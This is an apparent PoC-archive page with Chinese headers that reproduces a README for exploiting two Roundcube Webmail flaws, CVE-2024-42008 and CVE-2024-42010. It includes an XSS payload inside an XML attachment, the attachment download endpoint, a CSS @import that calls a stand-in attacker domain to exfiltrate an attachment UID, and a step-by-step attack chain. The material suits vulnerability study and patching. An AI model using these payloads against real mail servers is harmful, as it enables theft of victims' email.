关联漏洞
标题:
Roundcube Webmail 安全漏洞
(CVE-2024-42008)
描述:Roundcube Webmail是一款基于浏览器的开源IMAP客户端,它支持地址薄管理、信息搜索、拼写检查等。 Roundcube Webmail 1.5.7及之前版本和1.6.8之前的1.6.x版本存在安全漏洞,该漏洞源于存在跨站脚本漏洞,远程攻击者可以通过带有危险Content-Type标头的恶意电子邮件附件窃取和发送受害者的电子邮件。
描述
POCof Roundcube vulnerabilities CVE-2024-42008 and CVE-2024-42010
介绍
### Proof of Concept: CVE-2024-42008 and CVE-2024-42010
This proof of concept (PoC) demonstrates the exploitation of two vulnerabilities in Roundcube Webmail that enable CSS injection and a cross-site scripting (XSS). The attack consists of two stages:
1. **XSS via malicious XML attachment (CVE-2024-42008)**
Because of insufficient file upload checks, an XML file can be sent as an attachment with JavaScript code e.g.
```xml
<something:script xmlns:something="<http://www.w3.org/1999/xhtml>">
alert(origin)
</something:script>
```
This was a known issue and tracked as CVE-2020-13965 and the mitigation was to disable the "Open attachment" option. But the file can still be accessed through the endpoint
```
https://roundcube.host.com/?_task=mail&_mbox=INBOX&_uid=[UID]&_part=2&_download=0&_action=get
```
Where UID is the unique identifier for this particular attachment in this particular mailbox (i.e. INBOX).

3. **HTML exfiltration via CSS injection (CVE-2024-42010)**
When sending an email, it is possible to injection your own CSS file, when hosted in a domain that starts with `a`. Through that and a JavaScript server file that processes the requests made by the vulnerable Roundcube host, it is possible to extract the UID of the malicious XSS attachment.
Import the CSS in a sent email with
```css
<style>
@import "//a.attackerdomain.com/start?"
</style>
```
Host the JS server (roundcube-css-exploit.js) that exfiltrates the UID of the malicious attachment

**Attack Chain**
1. Host in your domain the JavaScript server
2. Send an email with a malicious XML attachment and import the CSS from your domain
3. The victim opens the email and the UID gets exfiltrated
4. Then, depending on the preferred way of the XSS delivery you can either send a second email with the attachment link or redirect the user through there.
**Source: [Government Emails at Risk: Critical Cross-Site Scripting Vulnerability in Roundcube Webmail (Sonar's Vulnerability Research Team)](https://www.sonarsource.com/blog/government-emails-at-risk-critical-cross-site-scripting-vulnerability-in-roundcube-webmail/)**
文件快照
[4.0K] /data/pocs/011c8ae6a886f6dee6dec9936e8e8f055aa91f42
├── [208K] css.png
├── [2.2K] README.md
├── [3.1K] roundcube-css-exploit.js
└── [ 98K] xss.png
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。